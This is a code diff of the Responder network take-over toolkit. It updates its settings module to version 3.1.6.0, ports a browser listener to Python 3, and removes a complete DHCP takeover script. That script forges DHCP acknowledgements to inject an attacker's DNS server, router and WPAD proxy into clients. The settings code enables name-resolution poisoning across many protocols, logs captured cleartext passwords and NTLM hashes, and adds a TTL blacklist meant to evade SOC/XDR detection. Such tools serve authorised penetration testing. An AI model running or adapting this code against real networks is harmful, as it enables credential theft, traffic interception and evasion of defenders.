0)): + import configparser as ConfigParser +else: + import ConfigParser import subprocess from utils import * -__version__ = 'Responder 2.3.3.5' +__version__ = 'Responder 3.1.6.0' class Settings: @@ -39,25 +42,56 @@ class Settings: return str.upper() == 'ON' def ExpandIPRanges(self): - def expand_ranges(lst): + def expand_ranges(lst): ret = [] for l in lst: - tab = l.split('.') - x = {} - i = 0 - for byte in tab: - if '-' not in byte: - x[i] = x[i+1] = int(byte) - else: - b = byte.split('-') - x[i] = int(b[0]) - x[i+1] = int(b[1]) - i += 2 - for a in range(x[0], x[1]+1): - for b in range(x[2], x[3]+1): - for c in range(x[4], x[5]+1): - for d in range(x[6], x[7]+1): - ret.append('%d.%d.%d.%d' % (a, b, c, d)) + if ':' in l: #For IPv6 addresses, similar to the IPv4 version below but hex and pads :'s to expand shortend addresses + while l.count(':') < 7: + pos = l.find('::') + l = l[:pos] + ':' + l[pos:] + tab = l.split(':') + x = {} + i = 0 + xaddr = '' + for byte in tab: + if byte == '': + byte = '0' + if '-' not in byte: + x[i] = x[i+1] = int(byte, base=16) + else: + b = byte.split('-') + x[i] = int(b[0], base=16) + x[i+1] = int(b[1], base=16) + i += 2 + for a in range(x[0], x[1]+1): + for b in range(x[2], x[3]+1): + for c in range(x[4], x[5]+1): + for d in range(x[6], x[7]+1): + for e in range(x[8], x[9]+1): + for f in range(x[10], x[11]+1): + for g in range(x[12], x[13]+1): + for h in range(x[14], x[15]+1): + xaddr = ('%x:%x:%x:%x:%x:%x:%x:%x' % (a, b, c, d, e, f, g, h)) + xaddr = re.sub('(^|:)0{1,4}', ':', xaddr, count = 7)#Compresses expanded IPv6 address + xaddr = re.sub(':{3,7}', '::', xaddr, count = 7) + ret.append(xaddr) + else: + tab = l.split('.') + x = {} + i = 0 + for byte in tab: + if '-' not in byte: + x[i] = x[i+1] = int(byte) + else: + b = byte.split('-') + x[i] = int(b[0]) + x[i+1] = int(b[1]) + i += 2 + for a in range(x[0], x[1]+1): + for b in range(x[2], x[3]+1): + for c in range(x[4], x[5]+1): + for d in range(x[6], x[7]+1): + ret.append('%d.%d.%d.%d' % (a, b, c, d)) return ret self.RespondTo = expand_ranges(self.RespondTo) @@ -65,30 +99,45 @@ class Settings: def populate(self, options): - if options.Interface is None and utils.IsOsX() is False: - print utils.color("Error: -I mandatory option is missing", 1) + if options.Interface == None and utils.IsOsX() == False: + print(utils.color("Error: -I mandatory option is missing", 1)) sys.exit(-1) if options.Interface == "ALL" and options.OURIP == None: - print utils.color("Error: -i is missing.\nWhen using -I ALL you need to provide your current ip address", 1) + print(utils.color("Error: -i is missing.\nWhen using -I ALL you need to provide your current ip address", 1)) sys.exit(-1) - + #Python version + if (sys.version_info > (3, 0)): + self.PY2OR3 = "PY3" + else: + self.PY2OR3 = "PY2" # Config parsing config = ConfigParser.ConfigParser() config.read(os.path.join(self.ResponderPATH, 'Responder.conf')) + # Poisoners + self.LLMNR_On_Off = self.toBool(config.get('Responder Core', 'LLMNR')) + self.NBTNS_On_Off = self.toBool(config.get('Responder Core', 'NBTNS')) + self.MDNS_On_Off = self.toBool(config.get('Responder Core', 'MDNS')) + # Servers self.HTTP_On_Off = self.toBool(config.get('Responder Core', 'HTTP')) self.SSL_On_Off = self.toBool(config.get('Responder Core', 'HTTPS')) self.SMB_On_Off = self.toBool(config.get('Responder Core', 'SMB')) + self.QUIC_On_Off = self.toBool(config.get('Responder Core', 'QUIC')) self.SQL_On_Off = self.toBool(config.get('Responder Core', 'SQL')) self.FTP_On_Off = self.toBool(config.get('Responder Core', 'FTP')) self.POP_On_Off = self.toBool(config.get('Responder Core', 'POP')) self.IMAP_On_Off = self.toBool(config.get('Responder Core', 'IMAP')) self.SMTP_On_Off = self.toBool(config.get('Responder Core', 'SMTP')) self.LDAP_On_Off = self.toBool(config.get('Responder Core', 'LDAP')) + self.MQTT_On_Off = self.toBool(config.get('Responder Core', 'MQTT')) self.DNS_On_Off = self.toBool(config.get('Responder Core', 'DNS')) + self.RDP_On_Off = self.toBool(config.get('Responder Core', 'RDP')) + self.DCERPC_On_Off = self.toBool(config.get('Responder Core', 'DCERPC')) + self.WinRM_On_Off = self.toBool(config.get('Responder Core', 'WINRM')) self.Krb_On_Off = self.toBool(config.get('Responder Core', 'Kerberos')) + self.SNMP_On_Off = self.toBool(config.get('Responder Core', 'SNMP')) # Db File self.DatabaseFile = os.path.join(self.ResponderPATH, config.get('Responder Core', 'Database')) @@ -104,14 +153,93 @@ class Settings: self.AnalyzeLogFile = os.path.join(self.LogDir, config.get('Responder Core', 'AnalyzeLog')) self.ResponderConfigDump = os.path.join(self.LogDir, config.get('Responder Core', 'ResponderConfigDump')) + # CLI options + self.ExternalIP = options.ExternalIP + self.LM_On_Off = options.LM_On_Off + self.NOESS_On_Off = options.NOESS_On_Off + self.WPAD_On_Off = options.WPAD_On_Off + self.DHCP_On_Off = options.DHCP_On_Off + self.Basic = options.Basic + self.Interface = options.Interface + self.OURIP = options.OURIP + self.Force_WPAD_Auth = options.Force_WPAD_Auth + self.Upstream_Proxy = options.Upstream_Proxy + self.AnalyzeMode = options.Analyze + self.Verbose = options.Verbose + self.ProxyAuth_On_Off = options.ProxyAuth_On_Off + self.CommandLine = str(sys.argv) + self.Bind_To = utils.FindLocalIP(self.Interface, self.OURIP) + self.Bind_To6 = utils.FindLocalIP6(self.Interface, self.OURIP) + self.DHCP_DNS = options.DHCP_DNS + self.ExternalIP6 = options.ExternalIP6 + self.Quiet_Mode = options.Quiet + self.AnswerName = options.AnswerName + self.ErrorCode = options.ErrorCode + + # TTL blacklist. Known to be detected by SOC / XDR + TTL_blacklist = [b"\x00\x00\x00\x1e", b"\x00\x00\x00\x78", b"\x00\x00\x00\xa5"] + # Lets add a default mode, which uses Windows default TTL for each protocols (set respectively in packets.py) + if options.TTL is None: + self.TTL = None + + # Random TTL + elif options.TTL.upper() == "RANDOM": + TTL = bytes.fromhex("000000"+format(random.randint(10,90),'x')) + if TTL in TTL_blacklist: + TTL = int.from_bytes(TTL, "big")+1 + TTL = int.to_bytes(TTL, 4) + self.TTL = TTL.decode('utf-8') + else: + self.TTL = bytes.fromhex("000000"+options.TTL).decode('utf-8') + + #Do we have IPv6 for real? + self.IPv6 = utils.Probe_IPv6_socket() + + if self.Interface == "ALL": + self.Bind_To_ALL = True + else: + self.Bind_To_ALL = False + #IPV4 + if self.Interface == "ALL": + self.IP_aton = socket.inet_aton(self.OURIP) + else: + self.IP_aton = socket.inet_aton(self.Bind_To) + #IPV6 + if self.Interface == "ALL": + if self.OURIP != None and utils.IsIPv6IP(self.OURIP): + self.IP_Pton6 = socket.inet_pton(socket.AF_INET6, self.OURIP) + else: + self.IP_Pton6 = socket.inet_pton(socket.AF_INET6, self.Bind_To6) + + #External IP + if self.ExternalIP: + if utils.IsIPv6IP(self.ExternalIP): + sys.exit(utils.color('[!] IPv6 address provided with -e parameter. Use -6 IPv6_address instead.', 1)) + + self.ExternalIPAton = socket.inet_aton(self.ExternalIP) + self.ExternalResponderIP = utils.RespondWithIP() + else: + self.ExternalResponderIP = self.Bind_To + + #External IPv6 + if self.ExternalIP6: + self.ExternalIP6Pton = socket.inet_pton(socket.AF_INET6, self.ExternalIP6) + self.ExternalResponderIP6 = utils.RespondWithIP6() + else: + self.ExternalResponderIP6 = self.Bind_To6 + + self.Os_version = sys.platform + self.FTPLog = os.path.join(self.LogDir, 'FTP-Clear-Text-Password-%s.txt') self.IMAPLog = os.path.join(self.LogDir, 'IMAP-Clear-Text-Password-%s.txt') self.POP3Log = os.path.join(self.LogDir, 'POP3-Clear-Text-Password-%s.txt') self.HTTPBasicLog = os.path.join(self.LogDir, 'HTTP-Clear-Text-Password-%s.txt') self.LDAPClearLog = os.path.join(self.LogDir, 'LDAP-Clear-Text-Password-%s.txt') + self.MQTTLog = os.path.join(self.LogDir, 'MQTT-Clear-Text-Password-%s.txt') self.SMBClearLog = os.path.join(self.LogDir, 'SMB-Clear-Text-Password-%s.txt') self.SMTPClearLog = os.path.join(self.LogDir, 'SMTP-Clear-Text-Password-%s.txt') self.MSSQLClearLog = os.path.join(self.LogDir, 'MSSQL-Clear-Text-Password-%s.txt') + self.SNMPLog = os.path.join(self.LogDir, 'SNMP-Clear-Text-Password-%s.txt') self.LDAPNTLMv1Log = os.path.join(self.LogDir, 'LDAP-NTLMv1-Client-%s.txt') self.HTTPNTLMv1Log = os.path.join(self.LogDir, 'HTTP-NTLMv1-Client-%s.txt') @@ -134,80 +262,69 @@ class Settings: self.WPAD_Script = config.get('HTTP Server', 'WPADScript') self.HtmlToInject = config.get('HTTP Server', 'HtmlToInject') - if not os.path.exists(self.Html_Filename): - print utils.color("/!\ Warning: %s: file not found" % self.Html_Filename, 3, 1) + if len(self.HtmlToInject) == 0: + self.HtmlToInject = ""# Let users set it up themself in Responder.conf. "Loading" - if not os.path.exists(self.Exe_Filename): - print utils.color("/!\ Warning: %s: file not found" % self.Exe_Filename, 3, 1) + if len(self.WPAD_Script) == 0: + if self.WPAD_On_Off: + self.WPAD_Script = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; return "PROXY '+self.Bind_To+':3128; DIRECT";}' + + if self.ProxyAuth_On_Off: + self.WPAD_Script = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; return "PROXY '+self.Bind_To+':3128; DIRECT";}' + + if self.Serve_Exe == True: + if not os.path.exists(self.Html_Filename): + print(utils.color("/!\\ Warning: %s: file not found" % self.Html_Filename, 3, 1)) + + if not os.path.exists(self.Exe_Filename): + print(utils.color("/!\\ Warning: %s: file not found" % self.Exe_Filename, 3, 1)) # SSL Options self.SSLKey = config.get('HTTPS Server', 'SSLKey') self.SSLCert = config.get('HTTPS Server', 'SSLCert') # Respond to hosts - self.RespondTo = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')]) - self.RespondToName = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondToName').strip().split(',')]) - self.DontRespondTo = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')]) - self.DontRespondToName = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')]) - + self.RespondTo = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')])) + self.RespondToName = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondToName').strip().split(',')])) + self.DontRespondTo = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')])) + self.DontRespondToTLD = list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToTLD').strip().split(',')])) + self.DontRespondToName_= list(filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondToName').strip().split(',')])) + #add a .local to all provided DontRespondToName + self.MDNSTLD = ['.LOCAL'] + self.DontRespondToName = [x+y for x in self.DontRespondToName_ for y in ['']+self.MDNSTLD] + #Generate Random stuff for one Responder session + self.MachineName = 'WIN-'+''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(11)]) + self.Username = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)]) + self.Domain = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(4)]) + self.DHCPHostname = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(9)]) + self.DomainName = self.Domain + '.LOCAL' + self.MachineNego = ''.join([random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(9)]) +'$@'+self.DomainName + self.RPCPort = random.randrange(45000, 49999) # Auto Ignore List self.AutoIgnore = self.toBool(config.get('Responder Core', 'AutoIgnoreAfterSuccess')) self.CaptureMultipleCredentials = self.toBool(config.get('Responder Core', 'CaptureMultipleCredentials')) - self.CaptureMultipleHashFromSameHost = self.toBool(config.get('Responder Core', 'CaptureMultipleHashFromSameHost')) + self.CaptureMultipleHashFromSameHost = self.toBool(config.get('Responder Core', 'CaptureMultipleHashFromSameHost')) self.AutoIgnoreList = [] - # CLI options - self.ExternalIP = options.ExternalIP - self.LM_On_Off = options.LM_On_Off - self.WPAD_On_Off = options.WPAD_On_Off - self.Wredirect = options.Wredirect - self.NBTNSDomain = options.NBTNSDomain - self.Basic = options.Basic - self.Finger_On_Off = options.Finger - self.Interface = options.Interface - self.OURIP = options.OURIP - self.Force_WPAD_Auth = options.Force_WPAD_Auth - self.Upstream_Proxy = options.Upstream_Proxy - self.AnalyzeMode = options.Analyze - self.Verbose = options.Verbose - self.ProxyAuth_On_Off = options.ProxyAuth_On_Off - self.CommandLine = str(sys.argv) - - if self.ExternalIP: - self.ExternalIPAton = socket.inet_aton(self.ExternalIP) - - if self.HtmlToInject is None: - self.HtmlToInject = '' - - self.Bind_To = utils.FindLocalIP(self.Interface, self.OURIP) - - if self.Interface == "ALL": - self.Bind_To_ALL = True - else: - self.Bind_To_ALL = False - - if self.Interface == "ALL": - self.IP_aton = socket.inet_aton(self.OURIP) - else: - self.IP_aton = socket.inet_aton(self.Bind_To) - - self.Os_version = sys.platform - # Set up Challenge self.NumChal = config.get('Responder Core', 'Challenge') - if self.NumChal.lower() == 'random': - self.NumChal = "random" + if self.NumChal.lower() == 'random': + self.NumChal = "random" - if len(self.NumChal) is not 16 and not "random": - print utils.color("[!] The challenge must be exactly 16 chars long.\nExample: 1122334455667788", 1) + if len(self.NumChal) != 16 and self.NumChal != "random": + print(utils.color("[!] The challenge must be exactly 16 chars long.\nExample: 1122334455667788", 1)) sys.exit(-1) - self.Challenge = "" - if self.NumChal.lower() == 'random': - pass - else: - for i in range(0, len(self.NumChal),2): - self.Challenge += self.NumChal[i:i+2].decode("hex") + self.Challenge = b'' + if self.NumChal.lower() == 'random': + pass + else: + if self.PY2OR3 == 'PY2': + for i in range(0, len(self.NumChal),2): + self.Challenge += self.NumChal[i:i+2].decode("hex") + else: + self.Challenge = bytes.fromhex(self.NumChal) + # Set up logging logging.basicConfig(filename=self.SessionLogFile, level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p') @@ -226,7 +343,14 @@ class Settings: self.AnalyzeLogger = logging.getLogger('Analyze Log') self.AnalyzeLogger.addHandler(ALog_Handler) - + + # First time Responder run? + if os.path.isfile(self.ResponderPATH+'/Responder.db'): + pass + else: + #If it's the first time, generate SSL certs for this Responder session and send openssl output to /dev/null + Certs = os.system(self.ResponderPATH+"/certs/gen-self-signed-cert.sh >/dev/null 2>&1") + try: NetworkCard = subprocess.check_output(["ifconfig", "-a"]) except: @@ -236,10 +360,12 @@ class Settings: NetworkCard = "Error fetching Network Interfaces:", ex pass try: - DNS = subprocess.check_output(["cat", "/etc/resolv.conf"]) - except subprocess.CalledProcessError as ex: - DNS = "Error fetching DNS configuration:", ex - pass + p = subprocess.Popen('resolvectl', stdout=subprocess.PIPE, stderr=subprocess.STDOUT) + DNS = p.stdout.read() + except: + p = subprocess.Popen(['cat', '/etc/resolv.conf'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT) + DNS = p.stdout.read() + try: RoutingInfo = subprocess.check_output(["netstat", "-rn"]) except: @@ -249,12 +375,12 @@ class Settings: RoutingInfo = "Error fetching Routing information:", ex pass - Message = "Current environment is:\nNetwork Config:\n%s\nDNS Settings:\n%s\nRouting info:\n%s\n\n"%(NetworkCard,DNS,RoutingInfo) + Message = "%s\nCurrent environment is:\nNetwork Config:\n%s\nDNS Settings:\n%s\nRouting info:\n%s\n\n"%(utils.HTTPCurrentDate(), NetworkCard.decode('latin-1'),DNS.decode('latin-1'),RoutingInfo.decode('latin-1')) try: utils.DumpConfig(self.ResponderConfigDump, Message) - utils.DumpConfig(self.ResponderConfigDump,str(self)) + #utils.DumpConfig(self.ResponderConfigDump,str(self)) except AttributeError as ex: - print "Missing Module:", ex + print("Missing Module:", ex) pass def init(): diff --git a/tools/BrowserListener.py b/tools/BrowserListener.py index a50d58f..f672621 100755 --- a/tools/BrowserListener.py +++ b/tools/BrowserListener.py @@ -1,5 +1,5 @@ #!/usr/bin/env python -# This file is part of Responder, a network take-over set of tools +# This file is part of Responder, a network take-over set of tools # created and maintained by Laurent Gaffie. # email: laurent.gaffie@gmail.com # This program is free software: you can redistribute it and/or modify @@ -16,103 +16,103 @@ # along with this program. If not, see . import sys import os -import thread +import _thread BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..')) sys.path.insert(0, BASEDIR) from servers.Browser import WorkstationFingerPrint, RequestType, RAPThisDomain, RapFinger -from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler +from socketserver import UDPServer, ThreadingMixIn, BaseRequestHandler from threading import Lock from utils import * def ParseRoles(data): - if len(data) != 4: - return '' + if len(data) != 4: + return '' - AllRoles = { - 'Workstation': (ord(data[0]) >> 0) & 1, - 'Server': (ord(data[0]) >> 1) & 1, - 'SQL': (ord(data[0]) >> 2) & 1, - 'Domain Controller': (ord(data[0]) >> 3) & 1, - 'Backup Controller': (ord(data[0]) >> 4) & 1, - 'Time Source': (ord(data[0]) >> 5) & 1, - 'Apple': (ord(data[0]) >> 6) & 1, - 'Novell': (ord(data[0]) >> 7) & 1, - 'Member': (ord(data[1]) >> 0) & 1, - 'Print': (ord(data[1]) >> 1) & 1, - 'Dialin': (ord(data[1]) >> 2) & 1, - 'Xenix': (ord(data[1]) >> 3) & 1, - 'NT Workstation': (ord(data[1]) >> 4) & 1, - 'WfW': (ord(data[1]) >> 5) & 1, - 'Unused': (ord(data[1]) >> 6) & 1, - 'NT Server': (ord(data[1]) >> 7) & 1, - 'Potential Browser': (ord(data[2]) >> 0) & 1, - 'Backup Browser': (ord(data[2]) >> 1) & 1, - 'Master Browser': (ord(data[2]) >> 2) & 1, - 'Domain Master Browser': (ord(data[2]) >> 3) & 1, - 'OSF': (ord(data[2]) >> 4) & 1, - 'VMS': (ord(data[2]) >> 5) & 1, - 'Windows 95+': (ord(data[2]) >> 6) & 1, - 'DFS': (ord(data[2]) >> 7) & 1, - 'Local': (ord(data[3]) >> 6) & 1, - 'Domain Enum': (ord(data[3]) >> 7) & 1, - } + AllRoles = { + 'Workstation': (ord(data[0]) >> 0) & 1, + 'Server': (ord(data[0]) >> 1) & 1, + 'SQL': (ord(data[0]) >> 2) & 1, + 'Domain Controller': (ord(data[0]) >> 3) & 1, + 'Backup Controller': (ord(data[0]) >> 4) & 1, + 'Time Source': (ord(data[0]) >> 5) & 1, + 'Apple': (ord(data[0]) >> 6) & 1, + 'Novell': (ord(data[0]) >> 7) & 1, + 'Member': (ord(data[1]) >> 0) & 1, + 'Print': (ord(data[1]) >> 1) & 1, + 'Dialin': (ord(data[1]) >> 2) & 1, + 'Xenix': (ord(data[1]) >> 3) & 1, + 'NT Workstation': (ord(data[1]) >> 4) & 1, + 'WfW': (ord(data[1]) >> 5) & 1, + 'Unused': (ord(data[1]) >> 6) & 1, + 'NT Server': (ord(data[1]) >> 7) & 1, + 'Potential Browser': (ord(data[2]) >> 0) & 1, + 'Backup Browser': (ord(data[2]) >> 1) & 1, + 'Master Browser': (ord(data[2]) >> 2) & 1, + 'Domain Master Browser': (ord(data[2]) >> 3) & 1, + 'OSF': (ord(data[2]) >> 4) & 1, + 'VMS': (ord(data[2]) >> 5) & 1, + 'Windows 95+': (ord(data[2]) >> 6) & 1, + 'DFS': (ord(data[2]) >> 7) & 1, + 'Local': (ord(data[3]) >> 6) & 1, + 'Domain Enum': (ord(data[3]) >> 7) & 1, + } - return ', '.join(k for k,v in AllRoles.items() if v == 1) + return ', '.join(k for k,v in list(AllRoles.items()) if v == 1) class BrowserListener(BaseRequestHandler): - def handle(self): - data, socket = self.request + def handle(self): + data, socket = self.request - lock = Lock() - lock.acquire() + lock = Lock() + lock.acquire() - DataOffset = struct.unpack('. -import sys -import struct -import optparse -import ConfigParser -import os - -BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..')) -sys.path.insert(0, BASEDIR) -from odict import OrderedDict -from packets import Packet -from utils import * - -parser = optparse.OptionParser(usage='python %prog -I eth0 -d pwned.com -p 10.20.30.40 -s 10.20.30.1 -r 10.20.40.1', prog=sys.argv[0],) -parser.add_option('-I', '--interface', action="store", help="Interface name to use, example: eth0", metavar="eth0",dest="Interface") -parser.add_option('-d', '--dnsname', action="store", help="DNS name to inject, if you don't want to inject a DNS server, provide the original one.", metavar="pwned.com", default="pwned.com",dest="DNSNAME") -parser.add_option('-r', '--router', action="store", help="The ip address of the router or yours if you want to intercept traffic.", metavar="10.20.1.1",dest="RouterIP") -parser.add_option('-p', '--primary', action="store", help="The ip address of the original primary DNS server or yours", metavar="10.20.1.10",dest="DNSIP") -parser.add_option('-s', '--secondary', action="store", help="The ip address of the original secondary DNS server or yours", metavar="10.20.1.11",dest="DNSIP2") -parser.add_option('-n', '--netmask', action="store", help="The netmask of this network", metavar="255.255.255.0", default="255.255.255.0", dest="Netmask") -parser.add_option('-w', '--wpadserver', action="store", help="Your WPAD server string", metavar="\"http://wpadsrv/wpad.dat\"", default="", dest="WPAD") -parser.add_option('-S', action="store_true", help="Spoof the router ip address",dest="Spoof") -parser.add_option('-R', action="store_true", help="Respond to DHCP Requests, inject linux clients (very noisy, this is sent on 255.255.255.255)", dest="Respond_To_Requests") -options, args = parser.parse_args() - -def color(txt, code = 1, modifier = 0): - return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt) - -if options.Interface is None: - print color("[!]", 1, 1), "-I mandatory option is missing, please provide an interface." - exit(-1) -elif options.RouterIP is None: - print color("[!]", 1, 1), "-r mandatory option is missing, please provide the router's IP." - exit(-1) -elif options.DNSIP is None: - print color("[!]", 1, 1), "-p mandatory option is missing, please provide the primary DNS server ip address or yours." - exit(-1) -elif options.DNSIP2 is None: - print color("[!]", 1, 1), "-s mandatory option is missing, please provide the secondary DNS server ip address or yours." - exit(-1) - - -print '#############################################################################' -print '## DHCP INFORM TAKEOVER 0.2 ##' -print '## ##' -print '## By default, this script will only inject a new DNS/WPAD ##' -print '## server to a Windows <= XP/2003 machine. ##' -print '## ##' -print '## To inject a DNS server/domain/route on a Windows >= Vista and ##' -print '## any linux box, use -R (can be noisy) ##' -print '## ##' -print '## Use `RespondTo` setting in Responder.conf for in-scope targets only. ##' -print '#############################################################################' -print '' -print color('[*]', 2, 1), 'Listening for events...' - -config = ConfigParser.ConfigParser() -config.read(os.path.join(BASEDIR,'Responder.conf')) -RespondTo = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')]) -DontRespondTo = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')]) -Interface = options.Interface -Responder_IP = FindLocalIP(Interface) -ROUTERIP = options.RouterIP -NETMASK = options.Netmask -DHCPSERVER = Responder_IP -DNSIP = options.DNSIP -DNSIP2 = options.DNSIP2 -DNSNAME = options.DNSNAME -WPADSRV = options.WPAD.strip() + "\\n" -Spoof = options.Spoof -Respond_To_Requests = options.Respond_To_Requests - -if Spoof: - DHCPSERVER = ROUTERIP - -##### IP Header ##### -class IPHead(Packet): - fields = OrderedDict([ - ("Version", "\x45"), - ("DiffServices", "\x00"), - ("TotalLen", "\x00\x00"), - ("Ident", "\x00\x00"), - ("Flags", "\x00\x00"), - ("TTL", "\x40"), - ("Protocol", "\x11"), - ("Checksum", "\x00\x00"), - ("SrcIP", ""), - ("DstIP", ""), - ]) - -class UDP(Packet): - fields = OrderedDict([ - ("SrcPort", "\x00\x43"), - ("DstPort", "\x00\x44"), - ("Len", "\x00\x00"), - ("Checksum", "\x00\x00"), - ("Data", "\x00\x00"), - ]) - - def calculate(self): - self.fields["Len"] = struct.pack(">h",len(str(self.fields["Data"]))+8) - -class DHCPACK(Packet): - fields = OrderedDict([ - ("MessType", "\x02"), - ("HdwType", "\x01"), - ("HdwLen", "\x06"), - ("Hops", "\x00"), - ("Tid", "\x11\x22\x33\x44"), - ("ElapsedSec", "\x00\x00"), - ("BootpFlags", "\x00\x00"), - ("ActualClientIP", "\x00\x00\x00\x00"), - ("GiveClientIP", "\x00\x00\x00\x00"), - ("NextServerIP", "\x00\x00\x00\x00"), - ("RelayAgentIP", "\x00\x00\x00\x00"), - ("ClientMac", "\xff\xff\xff\xff\xff\xff"), - ("ClientMacPadding", "\x00" *10), - ("ServerHostname", "\x00" * 64), - ("BootFileName", "\x00" * 128), - ("MagicCookie", "\x63\x82\x53\x63"), - ("DHCPCode", "\x35"), #DHCP Message - ("DHCPCodeLen", "\x01"), - ("DHCPOpCode", "\x05"), #Msgtype(ACK) - ("Op54", "\x36"), - ("Op54Len", "\x04"), - ("Op54Str", ""), #DHCP Server - ("Op51", "\x33"), - ("Op51Len", "\x04"), - ("Op51Str", "\x00\x01\x51\x80"), #Lease time, 1 day - ("Op1", "\x01"), - ("Op1Len", "\x04"), - ("Op1Str", ""), #Netmask - ("Op15", "\x0f"), - ("Op15Len", "\x0e"), - ("Op15Str", ""), #DNS Name - ("Op3", "\x03"), - ("Op3Len", "\x04"), - ("Op3Str", ""), #Router - ("Op6", "\x06"), - ("Op6Len", "\x08"), - ("Op6Str", ""), #DNS Servers - ("Op252", "\xfc"), - ("Op252Len", "\x04"), - ("Op252Str", ""), #Wpad Server - ("Op255", "\xff"), - ("Padding", "\x00"), - ]) - - def calculate(self): - self.fields["Op54Str"] = socket.inet_aton(DHCPSERVER) - self.fields["Op1Str"] = socket.inet_aton(NETMASK) - self.fields["Op3Str"] = socket.inet_aton(ROUTERIP) - self.fields["Op6Str"] = socket.inet_aton(DNSIP)+socket.inet_aton(DNSIP2) - self.fields["Op15Str"] = DNSNAME - self.fields["Op252Str"] = WPADSRV - self.fields["Op15Len"] = struct.pack(">b",len(str(self.fields["Op15Str"]))) - self.fields["Op252Len"] = struct.pack(">b",len(str(self.fields["Op252Str"]))) - -class DHCPInformACK(Packet): - fields = OrderedDict([ - ("MessType", "\x02"), - ("HdwType", "\x01"), - ("HdwLen", "\x06"), - ("Hops", "\x00"), - ("Tid", "\x11\x22\x33\x44"), - ("ElapsedSec", "\x00\x00"), - ("BootpFlags", "\x00\x00"), - ("ActualClientIP", "\x00\x00\x00\x00"), - ("GiveClientIP", "\x00\x00\x00\x00"), - ("NextServerIP", "\x00\x00\x00\x00"), - ("RelayAgentIP", "\x00\x00\x00\x00"), - ("ClientMac", "\xff\xff\xff\xff\xff\xff"), - ("ClientMacPadding", "\x00" *10), - ("ServerHostname", "\x00" * 64), - ("BootFileName", "\x00" * 128), - ("MagicCookie", "\x63\x82\x53\x63"), - ("Op53", "\x35\x01\x05"), #Msgtype(ACK) - ("Op54", "\x36"), - ("Op54Len", "\x04"), - ("Op54Str", ""), #DHCP Server - ("Op1", "\x01"), - ("Op1Len", "\x04"), - ("Op1Str", ""), #Netmask - ("Op15", "\x0f"), - ("Op15Len", "\x0e"), - ("Op15Str", ""), #DNS Name - ("Op3", "\x03"), - ("Op3Len", "\x04"), - ("Op3Str", ""), #Router - ("Op6", "\x06"), - ("Op6Len", "\x08"), - ("Op6Str", ""), #DNS Servers - ("Op252", "\xfc"), - ("Op252Len", "\x04"), - ("Op252Str", ""), #Wpad Server. - ("Op255", "\xff"), - ]) - - def calculate(self): - self.fields["Op54Str"] = socket.inet_aton(DHCPSERVER) - self.fields["Op1Str"] = socket.inet_aton(NETMASK) - self.fields["Op3Str"] = socket.inet_aton(ROUTERIP) - self.fields["Op6Str"] = socket.inet_aton(DNSIP)+socket.inet_aton(DNSIP2) - self.fields["Op15Str"] = DNSNAME - self.fields["Op252Str"] = WPADSRV - self.fields["Op15Len"] = struct.pack(">b",len(str(self.fields["Op15Str"]))) - self.fields["Op252Len"] = struct.pack(">b",len(str(self.fields["Op252Str"]))) - -def SpoofIP(Spoof): - return ROUTERIP if Spoof else Responder_IP - -def RespondToThisIP(ClientIp): - if ClientIp.startswith('127.0.0.'): - return False - elif RespondTo and ClientIp not in RespondTo: - return False - elif ClientIp in RespondTo or RespondTo == []: - if ClientIp not in DontRespondTo: - return True - return False - -def ParseSrcDSTAddr(data): - SrcIP = socket.inet_ntoa(data[0][26:30]) - DstIP = socket.inet_ntoa(data[0][30:34]) - SrcPort = struct.unpack('>H',data[0][34:36])[0] - DstPort = struct.unpack('>H',data[0][36:38])[0] - return SrcIP, SrcPort, DstIP, DstPort - -def FindIP(data): - IP = ''.join(re.findall(r'(?<=\x32\x04)[^EOF]*', data)) - return ''.join(IP[0:4]) - -def ParseDHCPCode(data): - PTid = data[4:8] - Seconds = data[8:10] - CurrentIP = socket.inet_ntoa(data[12:16]) - RequestedIP = socket.inet_ntoa(data[16:20]) - MacAddr = data[28:34] - MacAddrStr = ':'.join('%02x' % ord(m) for m in MacAddr).upper() - OpCode = data[242:243] - RequestIP = data[245:249] - - # DHCP Inform - if OpCode == "\x08": - IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=socket.inet_aton(CurrentIP)) - Packet = DHCPInformACK(Tid=PTid, ClientMac=MacAddr, ActualClientIP=socket.inet_aton(CurrentIP), - GiveClientIP=socket.inet_aton("0.0.0.0"), - NextServerIP=socket.inet_aton("0.0.0.0"), - RelayAgentIP=socket.inet_aton("0.0.0.0"), - ElapsedSec=Seconds) - Packet.calculate() - Buffer = UDP(Data = Packet) - Buffer.calculate() - SendDHCP(str(IP_Header)+str(Buffer), (CurrentIP, 68)) - return 'Acknowledged DHCP Inform for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, 